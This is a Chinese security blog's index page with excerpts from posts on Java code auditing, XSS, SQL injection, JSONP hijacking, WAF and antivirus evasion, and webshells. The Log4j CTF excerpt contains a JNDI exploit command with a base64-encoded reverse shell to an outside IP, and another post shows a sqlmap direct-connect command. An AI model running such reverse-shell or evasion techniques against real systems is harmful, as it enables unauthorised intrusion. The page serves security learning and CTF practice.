- 博客(152)
- 资源 (2)
- 收藏
- 关注
RSS订阅原创 JAVA代码审计2个小tips
但不知道在哪个lib文件时可利用该工具快速获取到相关lib,适用于大量不知道lib文件的情况。这个框架的静态路由提取外面就讲的比较少了,因为不同的struts2 路由写法可能大概都不相同。IDEA的RestfulTool插件,一键化提取spring mvc框架的api路由。因此我们可以有限提取出相关的类名,方法名。如果不会用codeql也可采用,提取出相关的类名,方法。命名空间/类名,函数,特定构造方法进行构造的路由。然后基于jvm中去获取相关中间组件的路由即可。采用这个方法进行构造一个完整的路由。
2024-05-08 14:37:50
254
原创 代码审计之某高校通用系统getRequsetURI函数的三次鉴权绕过
写个随笔,写个代码审计的漏洞案例,该系统为大量高校使用的一个系统。三次绕过。
2024-05-07 19:41:54
254
原创 代码审计之浅谈RASP技术
想摆会烂,所以就落个笔吧。其实本来是想写关于iast技术的,但是认真思考了下,感觉笔者自己本身也不太能讲清楚iast技术,怕误人子弟。所以最后还是基于笔者的理解以及实际应用写一篇关于RASP技术的文章,笔者能力有限,如有错误,欢迎斧正。
2024-05-04 00:12:12
1150
原创 代码审计之SAST自动化
很久没写文章了,有点忙,落个笔,分享一些捣鼓或说适配好的一些好玩的东西。脚本工具不开源,给一些思路,希望能给大家带来一些收获。笔者能力有限,如有错误,欢迎斧正。
2024-04-30 22:21:58
720
原创 JAVA代码审计之XSS漏洞
满足上面的条件,导致利用set方法可控制uri值及set方法中存在loadSVGDocument方法可以去引用svg进而去调用loadScript方法,而该loadScript方法中如果类型为application/java-archive时,可引入外部一个jar包,且cs可将该jar包实例化为一个对象,进而导致代码执行。但是结合其他漏洞,就可以达到1click实现RCE漏洞的效果,如宝塔rce,小皮面板rce,cs rce,蚁剑反制,goby反制均为如此。最近看到了很多安全圈的瓜,什么不如保安。
2024-02-23 22:51:55
760
原创 java代码审计之SQL注入漏洞
开更文章了,开一个关于Java代码审计相关的系列。本来是想写成一本书的模式的,但是越写越发觉,篇幅太多,想了下还是每个专题单独写,而后最后汇总到一起。慢慢写,基于笔者的理解抒写,如有问题,忘斧正。关于这个系列不会可能有些不会写修复方案,也不会写得特别细,这类文章外面太多了。重点是思路和思考。
2024-02-18 22:23:56
928
原创 备份扫描工具 god_bak
不想写东西,或者说换种说法 有些东西还没写完,有些系列也还没整完。就放一个昨天摸鱼写的东西。如图,每个系列都还是会按照自己的风格来写,代码审计实战等都会结合自己挖掘或审计过的案例进行结合知识点的风格去写,几个系列会慢慢放出来,一切随时间,最后每个系列也都会汇总为一个合计订本。python4 god_bak.py -f url.txt开发该工具的核心原因就是:打攻防,遇见过很多案例以自己域名为缩写的备份文件名,想着就写了一个。工具原理:这里的核心就是字典生成切割URL,获取域名部分,再根据.进行切
2023-11-07 15:47:37
208
原创 知识管理一体化
自信从容,虚心进步,慢慢成长。大胆追逐自己想要的一切,大胆的爱自己所爱之人,剩下留给天意,别那么在乎获得。退万步讲,如果真的不ok,转身走就ok,对得起自己最重要。
2023-06-24 15:12:20
441
1
原创 sqlmap拿shell
sqlmap5种思路拿shell总结①利用dump 管理员类的账户后进入进行站点后拿shell或者拿到账户后远程连接进行连接进行udf类提取类拿shell#连接方法sqlmap -d “mysql://admin:[email protected]:3306/security” admin是账号,psw是密码,后面是地址和端口,security数据库。我们数据库可以用current-db来查看②利用os-shell 拿shell条件①知绝对路径 ②管理员权限 ③开启③
2023-06-20 09:43:38
2291
原创 安全知识网站分享
前言:这两天被甲流整的状态有点难搞,不想学东西和写技术和挖洞,但是想写点什么。这篇文章不写技术,分享资源。分享一个小tips,我一直在用的一种思路,很久之前从一个师傅那里学来的快速聚合信息,汇总常见的安全网站,至少我知道的差不多是这些。核心代码:安全收集网站汇总如下:分享一个我学习找资源的一个tips和汇总常见的网站https://ninjia.gitbook.io/secskill/web/info?q={keyword}https://xz.aliyun.com/search?k
2023-03-14 23:30:26
314
1
原创 快速挖掘技巧+某学校实战案例分享
前段时间,跟一个朋友聊天中,被提到想看写一些实战的文章,学习挖掘的思路,而不是写一些bypass思路的tips。不过因为学东西+毕业设计,也一直没空写相关的文章,最近刚把毕设整的差不多了,还差2个漏洞没修,也暂时不想写论文。想歇会,就给大家水一篇之前挖洞的实战文章,大佬们就勿喷了,重点思路吧。案例的话,因为很久没碰过edu了,所以就拿去年整的某体育学院的为例咯。
2023-03-11 18:26:40
591
原创 java el表达式+scriptengine webshell 分享
翻自己以前写过的东西,在土司翻到了以前提到过的这个问题,这个问题之前查看别的师傅写的文章,很早就有了相关的解决方法,但是一直没回复这种的解决思路,这里分享下,主要分享el表达式加scriptengine的思路,也当作水篇文章吧。好好学习,好好锻炼,好好做饭,好好生活。
2023-02-24 22:44:09
337
原创 TP 5.0.24反序列化漏洞分析
很久没发过文章了,最近在研究审计链条相关的东西,codeql,ast,以及一些java的东西很多东西还是没学明白就先不写出来丢人了,写这篇tp的原因呢虽然这个漏洞的分析文章蛮多了,但是还是跟着看了下,一方面是因为以前对pop链挖掘一直学的懵懵懂懂的 ctf的一些pop链能出,但是到了框架里面自己就是挖不出来,所以就想着自己挖下tp反序列化的链子来看看,另一方面是想思考学习下php挖掘利用ast手法去该怎么入手(虽然后面这个问题还没解决),所以就有了这篇文章。
2022-10-20 16:02:54
5514
1
原创 Java审计框架基础
好像已经很久没发过文章了,水一篇吧,最近在回头恶补java web的一些东西还有研究链条和内存马的一些东西,有些东西还没整明白,怕误人子弟,所以暂时就不发了。后面等学明白了在发吧,先发一篇java审计需要的一些基础知识点吧,也能算是开发吧(也是笔者基于javaweb学习过程中自己基于自己的理解的一些学习笔记,所以可能存在一些问题,若有问题,希望批评指教),也希望能给入坑审计java审计的人一些参考吧。而至于实战审计的一些文章,最近一段时间应该是不会打算发的,倒不是说没相关的素材,最近也确实审计了不少的
2022-08-19 15:59:04
1524
原创 内容bypass分享
典型常见的拦截情况①直接reset②能上传成功但拦截url页面即访问时线上没有该页面个人理解的waf内容检测原理:waf检测的原理:动态检测–>检测进程和request和response包居多静态检测–>强检(检测到某些参数或者内容就直接reset掉)或者是弱检(即一部分敏感然后在给人检测)这里要绕的一般就是静态检测直接连shell的使用哥斯拉或者冰蝎冰蝎启动不了 解决方法https://blog.csdn.net/RABCDXB/article/details/122250489?sp
2022-07-25 11:51:38
8156
原创 PHP利用某些函数bypass waf探讨
前几天写了一篇文章,由黑到白这篇文章中用到echo的一个特性去一步一步写马看师傅们的评论然后去研究了下原因学到了很多比如linux写shell少了_POST空格以及$这些字符都写不进去也恰好看到了微信公众号里面有个师傅写了篇文章链接如下https里面提到了一个tips利用get_headers绕过了waf顿时引来了自己的兴趣,因为目前的很多waf是基于post包和get包来拦截的如果我把参数内容可控到header头里面不就能稳稳的过了嘛。............
2022-07-22 19:43:03
356
原创 过D盾php webshell免杀马探讨
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任最近有在系统的总计waf绕过内容和后缀的绕过,把以前别的师傅发过的很多东西做了一些总结在这个过程中发觉了其实webshell的bypass手法还是蛮多的后缀bypass总结完了经过实战也绕过了很多家最新的waf后缀内容的还没写完东西有点多这里就分享一些php免杀的马全过的也有贼多但是暂时就不分享了。......
2022-07-19 18:00:52
1616
1
原创 过d盾 jsp webshell+冰蝎免杀马探讨
jsp免杀马的思路其实一般最常用的就是反射和类加载问题+反转问题就能bypasswebshell的查杀了当然现在的有些厂商直接强标识这种就要el去绕咯。
2022-07-19 17:59:24
2298
1
原创 过d盾asp webshell+冰蝎免杀马探讨
正文asp免杀的手法其实也蛮多的个人理解其实免杀核心就是混淆+改变执行顺序啥的。对于asp而言,前者的利用特征这些进行绕后者就是利用函数数组+类的手法个人后者的手法用的最多一样吧这里先扔2个bypass的小马。...
2022-07-19 17:57:10
2117
原创 某设备由黑到白(附前台0day)
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任注本次测试为授权测试本文没啥特别实际的技术,只是给大家分享一些思路和自己的一些的一些思考,具体的系统师傅们自己定位。...
2022-07-19 17:19:32
1161
原创 免杀exe技术探讨
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任最近把大部分的语言的捣鼓分析了下c的python的rust的go的常见的语言市面上有的都研究了下也写了一下自己的发觉python的确实可以说是最简单的了,不过其实深入免杀的话还是得进程注入走ring0层去对抗杀软,不然单纯的静态过了终究有些行为还是会呗动态杀这篇分享一篇python的吧效果看正文全过的也有不过现在肯定是不会发的。...
2022-07-19 17:09:46
1131
原创 DLL免杀技术探讨
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任本来不打算写免杀相关的了但是确实是忍不住想吐槽,啧啧啧,因为有一直在研究进程注入以及ring3层的bypass免杀的一些东西因为就得去给相关的文件做免杀杀的然后给某步提交了一些样本提交完不管是否公开感觉就是转手就给厂商卖钱这里公开一个样本给大家看看时间样本均是登录账户提交的均未公开14的时候是vt全过。...
2022-07-19 17:05:17
1408
原创 bypass 某狗sql和xss
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
2022-07-19 16:57:40
260
原创 APP服务端挖掘
基础抓包常用模拟器①夜神模拟器7.0.0.6②MuMu模拟器burp抓包思路(真机或者虚拟机思路均同)这里以真机来复现电脑配置的1.)电脑开热点2.)查看本机的ipipconfig3.)burp中抓包设置然后点击ok 即启动监听了手机配置1.)连接wifi2.长按该wifi点击修改网络去设置代理3.浏览器中访问http://burp然后点击ca 进行下载证书 (或者电脑下载一个然后传到手机去 建议这种方法)4.)将下载下来的证书 改名为crt格式的(手机和
2022-05-06 08:08:11
1346
5
原创 一次批量挖掘时获取到的接口用以分析jsonp以及xss漏洞挖掘分析
前言:因为一直在捣鼓批量挖掘在测批量挖掘的一个思路时,跑了某个小游戏的域名跑出来这个接口觉得这个接口拿来当例子复现是个很不错的选择正文获取到如下的接口http://网站/api/position/615?callback=111发觉是一个很不错的例子这里就直接用这个来简单的教大家怎么挖掘jsonp的漏洞和xss进阶钓鱼使用xss基础的使用就不说了最基础的当然也是因为这里没waf 如果有waf的话就想办法绕就好了waf还是蛮好绕的这里肯定是核心写进阶利用的jsonp核心利用的
2022-05-02 23:55:38
538
3
原创 记录一下利用手机捣鼓的一些东西吧
手机排版将就看吧,具体操作自己研究这里只提供思路方向前言:因为一些事情,所以回家了,电脑也没带,暂时回不去学校,新买的电脑也还没到就只能用手机捣鼓和总结一些东西了,这里写一些出来,给大家提供一些思路一.游戏漏洞挖掘(基于内存的思路去搞)这里以小程序的为例利用gg修改器进行破解(因为这里做的是技术探讨,所以这里就选择一个不需要充值之类的游戏进行复现)游戏~~>房东模拟器这个游戏貌似还蛮火的,还有app端估计是一样的可搞进入正题现在刷好的挖掘思路1.1打开gg修改器进去选择游
2022-04-23 09:04:44
4700
原创 敏感信息泄露总结
一.源代码泄露二.服务器导致的泄露Apache类泄露样例文件泄露/examples/servlets/servlet/CookieExample/examples/servlets/servlet/RequestHeadersExample/examples/jsp/snp/snoop.jsp/examples/async/async1cookie泄露IIS泄露典型iis短文件名https://github.com/lijiejie/IIS_shortname_ScannerTo
2022-03-15 21:56:24
12758
5
原创 JAVA安全--log4j漏洞研究分析
log4j漏洞复现复现这里以bugku上的靶场为例进行复现https://ctf.bugku.com/challenges/detail/id/340.html环境配置①ldap服务服务器起一个ldap服务就好了直接执行反弹shell即直接配置bash反弹shell命令java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuM
2022-03-12 23:49:55
9460
原创 XSS进阶
前置知识点:①javascript基础知识javascript参考文档自我理解的javascript基础的javascript语法html dom理解属性从基础的语法也可以思考到我们能够利用js进行做的一些事情了只要具有内容 我们就可以调用js接口去获取很多东西甚至于如果浏览器的沙箱出问题了 或者是electron的东西 调用本地资源造成rce漏洞如 蜜罐去获取history 给我的理解就是访问一个网站后网站里面的js调用的web api去获取历史内容发送到指定的网站上去进而进
2022-03-10 23:35:14
1803
原创 jsonp劫持攻击
前言:对这个漏洞一直是知道是什么东西,但是一直不太懂这个漏洞该咋挖和咋进阶利用 今天上课的时候查漏补缺研究了下这个东西做了一个总结漏洞原理:核心利用的原理:JSONP技术可以实现数据的跨域访问,进而攻击者利用该漏洞可以向用户发送一个伪造的链接,进而当用户点击后进行回调函数进而即窃取到用户的信息典型可以跨域的标签< script src = "..." > </script><img src="..."><video src="..."><
2022-03-10 20:22:20
370
原创 IDEA部署jsp web网页方法
前言:好久之前写的了,发觉最近有人问,就发出来了①配置idea环境②tomcat环境配置2.1 下载tomcat环境官网:http://tomcat.apache.org/选择要下载的版本,最好和jdk相对应如果安装的JDK版本是1.8,建议下载Tomcat 8.0版本的服务器;如果安装的JDK版本是1.7,建议下载Tomcat 8.0版本的服务器。如若是mac用户下载tar.gz的安装包windows用户下载符合自己电脑的安装包2.2 Tomcat服务器安装● 安装:下载完成之后将
2022-03-10 13:03:52
2349
原创 利用手机作为渗透工具的一些思路
前言这里的配置指的是kali linux的安装wifi攻击破解的思路常用两种第一种wifite自动化WEP/WPA破解工具提示没有网卡就很难受第二种aircrack-ng破解监听网卡的账户密码dsniff -i wlan0
2022-03-02 23:41:15
8279
10
原创 记录某捷的代码审计(附5个rce0day)
前言:漏洞均已提交且均已修复这里文章只做技术交流关于这个系统 算是自己入门审代码审计审的第一个系统 反反复复审系统 审了大概 7-8个rce吧 还有一些其他的洞审计过程:
2022-02-20 08:44:31
3203
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人